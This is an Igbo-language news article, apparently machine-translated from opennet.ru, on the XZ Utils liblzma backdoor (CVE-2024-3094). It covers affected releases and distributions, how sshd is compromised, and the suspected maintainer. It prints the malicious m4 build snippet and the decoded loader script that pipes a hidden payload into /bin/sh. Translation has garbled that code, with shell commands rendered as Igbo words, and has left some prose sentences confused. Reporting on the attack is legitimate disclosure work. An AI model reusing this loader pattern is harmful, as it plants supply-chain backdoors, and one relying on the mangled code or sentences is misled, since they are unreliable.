Na ngwugwu XZ Utils, nke na-agụnye ọbá akwụkwọ liblzma na ihe ndị dị mkpa maka ịrụ ọrụ na data abịakọrọ na usoro ".xz", a chọpụtala azụ azụ (CVE-2024-3094) nke na-enye ohere nkwụsịtụ na mgbanwe nke data ejiri ngwa jikọtara ya. ya na ụlọ akwụkwọ liblzma. Ebumnuche bụ isi nke azụ azụ bụ sava OpenSSH, nke na-ejikọta na nkesa ụfọdụ na ọba akwụkwọ libsystemd, nke n'aka nke ya na-eji liblzma. Ijikọ sshd na ọbá akwụkwọ adịghị ike na-enye ndị na-awakpo ohere ịnweta sava SSH na-enweghị nkwenye.
Ọnụ ụzọ azụ dị na mwepụta gọọmentị 5.6.0 na 5.6.1, nke e bipụtara na February 24 na Machị 9, nke jisiri ike banye na nkesa na ebe nchekwa ụfọdụ, dịka ọmụmaatụ, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide na 40-beta, ụlọ ọrụ openSUSE na tumbleweed, LibreELEC, Alpine edge, Solus, NixOS ejighị n'aka, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current, Manjaro test. A na-atụ aro ndị ọrụ niile nke xz 5.6.0 na 5.6.1 ka ha tụgharịa ngwa ngwa na ụdị 5.4.6.
N'ime ihe ndị na-ebelata nsogbu ahụ, enwere ike ịmara na ụdị liblzma nwere azụ azụ emeghị ka ọ bụrụ akụkụ nke ntọhapụ kwụsiri ike nke nnukwu nkesa, ma emetụta openSUSE Tumbleweed na Fedora 40-beta. Arch Linux na Gentoo jiri ụdị zx na-adịghị ike, mana ha anaghị emetụta mwakpo ahụ n'ihi na ha anaghị etinye patch systemd-notify na openssh, nke na-eme ka sshd jikọọ na liblzma. Ọnụ ụzọ azụ na-emetụta sistemụ x86_64 dabere na Linux kernel na ọba akwụkwọ Glibc C.
Ezochiri koodu mmeghe nke azụ na m4 macros site na faịlụ build-to-host.m4 nke ngwa ngwa ngwa na-eji eme ihe mgbe a na-ewu ụlọ. N'oge mgbakọ, n'oge ogbugbu nke mgbagwoju anya obfuscated arụmọrụ dabeere na Archives (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), na-eji na-anwale izi ezi nke ọrụ, ihe faịlụ na-eji koodu ọjọọ emepụtara, nke gụnyere na. ọba akwụkwọ liblzma wee gbanwee mgbagha arụ ọrụ ụfọdụ n'ime ọrụ ya. Agụnyere macro m4 na-arụ ọrụ azụ n'azụ tarballs, mana adịghị na ebe nchekwa Git. N'otu oge ahụ, ebe nchekwa ule obi ọjọọ dị na ebe nchekwa ahụ, ya bụ. onye mejuputa atumatu azụ nwere ohere ma ebe nchekwa na usoro ntọhapụ.
Mgbe ị na-eji liblzma n'ime ngwa, enwere ike iji mgbanwe ọjọọ were gbochie ma ọ bụ gbanwee data, ma ọ bụ metuta ọrụ sshd. Karịsịa, koodu ọjọọ ahụ mebiri ọrụ RSA_public_decrypt iji gafere usoro nyocha sshd. Ọnụ ụzọ azụ ahụ gụnyere nchebe pụọ na nchọpụta na egosighi onwe ya mgbe edobere mgbanwe gburugburu LANG na TERM (ya bụ, mgbe a na-eme usoro ahụ na njedebe) na LD_DEBUG na LD_PROFILE agbanweghị mgbanwe gburugburu ebe obibi, ma na-arụkwa ọrụ naanị mgbe a na-eme ya. /usr/sbin/sshd executable faịlụ . Ọnụ ụzọ azụ ahụ nwekwara ụzọ e si achọpụta ogbugbu na gburugburu ebe nbipu.
Karịsịa, faịlụ m4/build-to-host.m4 ejiri gl_am_configmake=`grep -aErls “#{4}[[:alnum:]]{5}#{4}$” $srcdir/ 2>/dev / null` … gl_[$1]_config='sed \»r\n\» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
N'ime ihe owuwu nke mbụ, ọrụ grep chọtara faịlụ tests/files/bad-3-corrupt_lzma2.xz, bụ nke, mgbe a na-ewepụghị ya, wepụtara edemede: ####Hello#### #345U211267$^D330^W [! $(name) = "Linux"] && wepụ 0 [! $(name) = "Linux"] && wepụ 0 [! $(name) = "Linux"] && wepụ 0 [! $(name) = "Linux"] && wepụ 0 [! $(name) = "Linux" ] && wepụ 0 eval `grep ^srcdir= config.status` ma ọ bụrụ ule -f .././config.status; wee eval `grep ^srcdir= ../../config. .status` srcdir = "../../$srcdir" fi mbupụ i=»((isi -c +1024 >/dev/null) && isi -c +2048 && (isi -c +1024 >/dev/ null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi - c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi - c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/ dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && ( isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +2048 && (isi -c +1024>/dev/null) && isi -c +939)";(xz -dc) $srcdir/ tests/files/good-large_compressed.lzma|eval $i|ọdụ -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113""\0-\377")|xz -F raw —lzma1 -dc|/bin/sh ####World####
Ka ndị mwakpo ahụ siri nwee ike nweta akụrụngwa nke ọrụ xz akọwabeghị nke ọma. Amabeghịkwa ole ndị ọrụ na ọrụ emebiela n'ihi ọnụ ụzọ azụ. E boro ebubo na onye dere azụ azụ (JiaT75 - Jia Tan), onye biputere Archives nwere koodu obi ọjọọ na ebe nchekwa ahụ, kwekọrọ na ndị mmepe Fedora wee ziga arịrịọ ịdọrọ na Debian metụtara mgbanwe nke nkesa na ngalaba xz 5.6.0, ma o meghị. kpalie enyo, ebe ọ bụ na o sonye na xz na-etolite n'ime afọ abụọ gara aga ma bụrụ onye mmepụta nke abụọ n'ihe gbasara ọnụọgụ mgbanwe ndị e mere. Na mgbakwunye na ọrụ xz, onye eboro ebubo na ọ bụ onye na-ede azụ azụ sokwa na mmepe nke xz-java na ngwugwu xz. Ọzọkwa, Jia Tan ụbọchị ole na ole gara aga gụnyere na ọnụ ọgụgụ nke ndị na-elekọta ọrụ XZ Embedded ejiri na Linux kernel.
Achọpụtara mgbanwe obi ọjọọ ahụ mgbe nyochachara oriri CPU gabigara ókè yana mperi nke valgrind mepụtara mgbe ị na-ejikọ site na ssh na sistemụ dabere na Debian. Ọ bụ ihe kwesịrị ịrịba ama na ntọhapụ xz 5.6.1 gụnyere mgbanwe ndị eboro ebubo na-edepụta azụ azụ na nzaghachi maka mkpesa banyere sshd slowdowns na mkpọka nke bilitere mgbe emelitere na ụdị zx 5.6.0 na azụ azụ. Na mgbakwunye, n'afọ gara aga Jia Tan mere mgbanwe na-adabaghị na ọnọdụ nyocha "-fsanitize=address", na-eme ka ọ nwee nkwarụ n'oge ule fuzz.
isi: opennet.ru